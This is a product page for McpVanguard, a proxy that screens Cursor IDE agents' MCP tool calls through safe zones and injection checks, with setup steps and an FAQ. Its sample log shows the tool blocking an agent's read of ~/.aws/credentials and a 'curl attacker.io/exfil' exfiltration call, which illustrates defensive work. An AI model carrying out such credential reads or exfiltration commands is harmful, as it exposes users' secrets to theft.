All Integrations
Cursor IDE

Secure Cursor's agentic tool calls

MCP tool calls from Cursor that are routed through McpVanguard pass through its configured enforcement layers before reaching the server. Use profiles and safe zones to constrain filesystem and network-sensitive workflows.

McpVanguard — Cursor IDE session
$ vanguard start --profile balanced --server uvx mcp-server-filesystem ~/projects
▲ McpVanguard started | Profile: balanced
Safe zone: ~/projects/ | stdio mode
[11:02:44]ALLOWread_file → src/main.py
[11:02:45]ALLOWwrite_file → src/utils.py
[11:02:48]BLOCKread_file → ~/.aws/credentialsSAFE_ZONE
[11:02:52]BLOCKexecute_bash → curl attacker.io/exfilSSRF

Workspace confinement

Safe zone rules can constrain routed file access to configured project directories and exclude sensitive paths.

Injection-aware blocking

Configured checks can surface suspicious instruction patterns in routed arguments before they reach the MCP server.

Per-call audit trail

Routed decisions can emit structured audit events with verdict, rule, and request context for review.

Set up in 3 steps

No changes to Cursor or your MCP server. McpVanguard wraps the server as a transparent proxy.

1

Install McpVanguard

pip install mcp-vanguard
2

Wrap your MCP server

vanguard start \
  --profile balanced \
  --server uvx mcp-server-filesystem \
  --safe-zone ~/projects
3

Add to Cursor MCP config

# .cursor/mcp.json
{
  "mcpServers": {
    "filesystem": {
      "command": "vanguard",
      "args": [
        "start", "--profile", "balanced",
        "--server", "uvx",
        "mcp-server-filesystem",
        "${workspaceFolder}"
      ]
    }
  }
}

Common questions

How do I add MCP security to Cursor IDE?

Install McpVanguard with pip install mcp-vanguard. Then configure Cursor's MCP settings to route the MCP tool calls you want inspected through the vanguard start command wrapping your existing server.

Can McpVanguard prevent Cursor from accessing sensitive files?

McpVanguard can apply configured filesystem safe zones and path checks to routed calls. Requests outside those zones can be denied before reaching the filesystem server, depending on the active profile and configuration.

Does securing Cursor's MCP slow down my IDE?

Deterministic checks are designed to be lightweight, but actual latency depends on the profile, payload size, optional semantic backend, and deployment environment. Measure your routed workflow before production rollout.

Research Newsletter

Stay ahead of agentic threats

Follow our latest research on MCP vulnerabilities, defensive architecture, and verifiable execution. We publish updates on the site and in the RSS feed.